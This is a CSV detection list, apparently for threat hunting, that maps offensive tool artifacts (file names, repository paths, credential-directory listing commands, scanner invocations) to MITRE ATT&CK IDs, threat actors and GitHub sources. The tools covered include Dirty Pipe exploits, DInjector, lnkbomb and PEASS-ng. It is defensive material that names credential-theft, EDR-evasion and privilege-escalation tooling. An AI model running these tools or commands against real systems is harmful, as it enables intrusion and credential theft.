"*dicts/ssh_pswd.txt*",".{0,1000}dicts\/ssh_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","40879"
"*diego-treitos/linux-smart-enumeration*",".{0,1000}diego\-treitos\/linux\-smart\-enumeration.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","#linux","N/A","9","10","3575","584","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z","40880"
"*dievus/lnkbomb*",".{0,1000}dievus\/lnkbomb.{0,1000}","offensive_tool_keyword","lnkbomb","Malicious shortcut generator for collecting NTLM hashes from insecure file shares.","T1023.003 - T1557.002 - T1046","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/dievus/lnkbomb","1","1","N/A","N/A","10","4","327","58","2024-10-22T17:51:10Z","2022-01-03T04:17:11Z","40881"
"*dievus/PowerShellRunner*",".{0,1000}dievus\/PowerShellRunner.{0,1000}","offensive_tool_keyword","PowerShellRunner","PowerShell runner for executing malicious payloads in order to bypass Windows Defender","T1059.001 - T1562.001 - T1218.005","TA0002 - TA0005","N/A","Turla","Defense Evasion","https://github.com/dievus/PowerShellRunner","1","1","N/A","N/A","9","1","70","20","2021-11-22T18:43:16Z","2021-08-03T01:29:34Z","40882"
"*digitalocean-droplet-openvpn-all.jar*",".{0,1000}digitalocean\-droplet\-openvpn\-all\.jar.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","1","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","40886"
"*DigitalOceanProxyTab$1.class*",".{0,1000}DigitalOceanProxyTab\$1\.class.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","40887"
"*DigitalSignature-Hijack.ps1*",".{0,1000}DigitalSignature\-Hijack\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","40888"
"*Ding Ding Ding! Email opened!*",".{0,1000}Ding\sDing\sDing!\sEmail\sopened!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","40889"
"*dinjector /i:* /p:*",".{0,1000}dinjector\s\/i\:.{0,1000}\s\/p\:.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","40890"
"*DInjector.csproj*",".{0,1000}DInjector\.csproj.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40891"
"*DInjector.Detonator*",".{0,1000}DInjector\.Detonator.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","0","N/A","private github repo","8","","N/A","","","","40892"
"*DInjector.dll*",".{0,1000}DInjector\.dll.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40893"
"*DInjector/Dinjector*",".{0,1000}DInjector\/Dinjector.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40894"
"*Dinjector-main*",".{0,1000}Dinjector\-main.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","40895"
"*Dionach*PassHunt*",".{0,1000}Dionach.{0,1000}PassHunt.{0,1000}","offensive_tool_keyword","PassHunt","PassHunt searches drives for documents that contain passwords or any other regular expression. Its designed to be a simple. standalone tool that can be run from a USB stick.","T1081 - T1083 - T1003 - T1039 - T1213","TA0003 - TA0010","N/A","N/A","Discovery","https://github.com/Dionach/PassHunt","1","1","N/A","N/A","N/A","1","63","30","2014-07-11T09:08:02Z","2014-07-11T08:46:20Z","40896"
"*Dionach.ShareAudit.Model.dll*",".{0,1000}Dionach\.ShareAudit\.Model\.dll.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","40897"
"*Dionach.ShareAudit.Modules.Services.Interop.dll*",".{0,1000}Dionach\.ShareAudit\.Modules\.Services\.Interop\.dll.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","40898"
"*dionach/ShareAudit*",".{0,1000}dionach\/ShareAudit.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","1","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","40899"
"*dir /b/a %appdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%appdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40906"
"*dir /b/a %localappdata%\Microsoft\Credentials\ 2>nul*",".{0,1000}dir\s\/b\/a\s\%localappdata\%\\Microsoft\\Credentials\\\s2\>nul.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","40908"
"*dir_create2system.txt*",".{0,1000}dir_create2system\.txt.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40910"
"*dirb *http* /usr/share/seclists/Discovery/Web-Content/big.txt*",".{0,1000}dirb\s.{0,1000}http.{0,1000}\s\/usr\/share\/seclists\/Discovery\/Web\-Content\/big\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40911"
"*dirb/wordlists*",".{0,1000}dirb\/wordlists.{0,1000}","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","40912"
"*dircreate2system.cpp*",".{0,1000}dircreate2system\.cpp.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40913"
"*dircreate2system.exe*",".{0,1000}dircreate2system\.exe.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40914"
"*dircreate2system.vcxproj*",".{0,1000}dircreate2system\.vcxproj.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40915"
"*DirCreate2System-main*",".{0,1000}DirCreate2System\-main.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","1","N/A","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","40916"
"*dirdevil - PowerShell to hide data in directory structures*",".{0,1000}dirdevil\s\-\sPowerShell\sto\shide\sdata\sin\sdirectory\sstructures.{0,1000}","offensive_tool_keyword","dirdevil","PowerShell to hide data in directory structures","T1027 - T1083 - T1158 - T1059.001 - T1036","TA0005","N/A","N/A","Defense Evasion","https://github.com/nyxgeek/dirdevil","1","0","N/A","powershell content","6","1","44","6","2024-07-11T16:09:02Z","2024-06-25T07:26:30Z","40917"
"*Direct_Syscalls_Create_Thread.c*",".{0,1000}Direct_Syscalls_Create_Thread\.c.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40918"
"*Direct_Syscalls_Create_Thread.exe*",".{0,1000}Direct_Syscalls_Create_Thread\.exe.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40919"
"*Direct_Syscalls_Create_Thread.sln*",".{0,1000}Direct_Syscalls_Create_Thread\.sln.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40920"
"*Direct_Syscalls_Create_Thread.vcxproj*",".{0,1000}Direct_Syscalls_Create_Thread\.vcxproj.{0,1000}","offensive_tool_keyword","Direct-Syscalls","Direct-Syscalls technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40921"
"*Directory-Traversal-Payloads.*",".{0,1000}Directory\-Traversal\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","N/A","4","328","117","2024-09-20T09:59:28Z","2022-11-18T09:43:41Z","40922"
"*Direct-Syscalls-vs-Indirect-Syscalls.git*",".{0,1000}Direct\-Syscalls\-vs\-Indirect\-Syscalls\.git.{0,1000}","offensive_tool_keyword","Indirect-Syscalls","Indirect syscalls serve as an evolution of direct syscalls and enable enhanced EDR evasion by legitimizing syscall command execution and return statement within the ntdll.dll memory. This stealthy operation partially implements the syscall stub in the Indirect Syscall assembly itself.","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Direct-Syscalls-vs-Indirect-Syscalls","1","1","N/A","N/A","N/A","2","186","24","2024-01-20T12:02:18Z","2023-05-23T06:30:54Z","40923"
"*dirkjan@outsidersecurity.nl*",".{0,1000}dirkjan\@outsidersecurity\.nl.{0,1000}","offensive_tool_keyword","ROADtools","A collection of Azure AD tools for offensive and defensive security purposes","T1136.003 - T1078.004 - T1021.006 - T1003.003","TA0002 - TA0004 - TA0005 - TA0006","N/A","APT29 - COZY BEAR - Black Basta","Exploitation tool","https://github.com/dirkjanm/ROADtools","1","0","#email","network exploitation tool","10","10","2126","295","2025-04-17T18:55:20Z","2020-03-28T09:56:08Z","40924"
"*dirkjan@sanoweb.nl*",".{0,1000}dirkjan\@sanoweb\.nl.{0,1000}","offensive_tool_keyword","ldapdomaindump","Active Directory information dumper via LDAP","T1087 - T1005 - T1016","TA0007","N/A","EMBER BEAR","Discovery","https://github.com/dirkjanm/ldapdomaindump","1","1","#email","N/A","10","10","1242","201","2025-04-06T13:31:57Z","2016-05-24T18:46:56Z","40925"
"*dirkjanm/adidnsdump*",".{0,1000}dirkjanm\/adidnsdump.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","40926"
"*dirkjanm/ldapdomaindump*",".{0,1000}dirkjanm\/ldapdomaindump.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40927"
"*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40928"
"*dirkjanm/PKINITtools*",".{0,1000}dirkjanm\/PKINITtools.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550.003 - T1557.002 - T1552.004 - T1212 - T1550","TA0009 - TA0008","N/A","N/A","Lateral Movement","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","N/A","8","737","82","2025-01-03T14:25:52Z","2021-07-27T19:06:09Z","40929"
"*dirkjanm/PrivExchange*",".{0,1000}dirkjanm\/PrivExchange.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","N/A","10","1011","173","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z","40930"
"*dirkjanm/ROADtoken*",".{0,1000}dirkjanm\/ROADtoken.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","1","N/A","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","40931"
"*dirscanner.py*",".{0,1000}dirscanner\.py.{0,1000}","offensive_tool_keyword","RedTeam_toolkit","Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful offensive tools used in the red-teaming together","T1083 - T1065 - T1204 - T1087 - T1203","TA0007 - TA0005 - TA0001","N/A","N/A","Reconnaissance","https://github.com/signorrayan/RedTeam_toolkit","1","1","N/A","N/A","N/A","6","561","121","2025-03-28T06:59:25Z","2021-08-18T08:58:14Z","40932"
"*dirscraper*",".{0,1000}dirscraper.{0,1000}","offensive_tool_keyword","dirscraper","Dirscraper is an OSINT scanning tool which assists penetration testers in identifying hidden. or previously unknown. directories on a domain or subdomain. This helps greatly in the recon stage of pentesting as it provide pentesters with a larger attack surface for the specific domain.","T1596 - T1530 - T1201","TA0040  - ","N/A","N/A","Reconnaissance","https://github.com/Cillian-Collins/dirscraper","1","1","N/A","N/A","N/A","3","227","32","2019-02-24T12:22:47Z","2019-02-21T23:06:58Z","40933"
"*dirsearch -r -w /usr/share/wordlists/seclists/Discovery/Web-Content/quickhits.txt*",".{0,1000}dirsearch\s\-r\s\-w\s\/usr\/share\/wordlists\/seclists\/Discovery\/Web\-Content\/quickhits\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40934"
"*dirTraversal.txt*",".{0,1000}dirTraversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40935"
"*dirTraversal-nix.txt*",".{0,1000}dirTraversal\-nix\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40936"
"*dirTraversal-win.txt*",".{0,1000}dirTraversal\-win\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40937"
"*dirty_sock*",".{0,1000}dirty_sock.{0,1000}","offensive_tool_keyword","POC","dirty_sock: Linux Privilege Escalation (via snapd) In January 2019. current versions of Ubuntu Linux were found to be vulnerable to local privilege escalation due to a bug in the snapd API. This repository contains the original exploit POC","T1210 - T1211 - T1212 - T1547","TA0002 - TA0009","N/A","N/A","Exploitation tool","https://github.com/initstring/dirty_sock","1","1","#linux","N/A","N/A","7","671","147","2019-05-09T21:34:26Z","2019-02-12T06:02:06Z","40938"
"*dirty_sock/archive/master.zip*",".{0,1000}dirty_sock\/archive\/master\.zip.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","40939"
"*dirtyclrdomain*",".{0,1000}dirtyclrdomain.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","N/A","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","40940"
"*dirtypipe.cm4all.com*",".{0,1000}dirtypipe\.cm4all\.com.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","40941"
"*Dirty-Pipe/exploit-static*",".{0,1000}Dirty\-Pipe\/exploit\-static.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/carlosevieira/Dirty-Pipe","1","1","N/A","N/A","N/A","1","9","6","2022-03-07T21:01:15Z","2022-03-07T20:57:34Z","40942"
"*dirtypipe-exploit/blob/main/dirtypipe.c*",".{0,1000}dirtypipe\-exploit\/blob\/main\/dirtypipe\.c.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","","N/A","","","","40943"
"*-DirtyPipe-Exploits*",".{0,1000}\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","N/A","N/A","N/A","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","40944"
"*DirtyVanity.exe*",".{0,1000}DirtyVanity\.exe.{0,1000}","offensive_tool_keyword","Dirty-Vanity","injection technique abusing windows fork API to evade EDRs","T1055 - T1562 - T1070 - T1027","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/Dirty-Vanity","1","1","N/A","N/A","10","7","633","86","2022-12-23T10:54:10Z","2022-11-24T10:54:00Z","40945"
"*dirwalk.py*",".{0,1000}dirwalk\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","40946"
"*'Disable all http access logs'*",".{0,1000}\'Disable\sall\shttp\saccess\slogs\'.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","40947"
"*disable_clamav.*",".{0,1000}disable_clamav\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40948"
"*disable_clamav.rb*",".{0,1000}disable_clamav\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","40949"
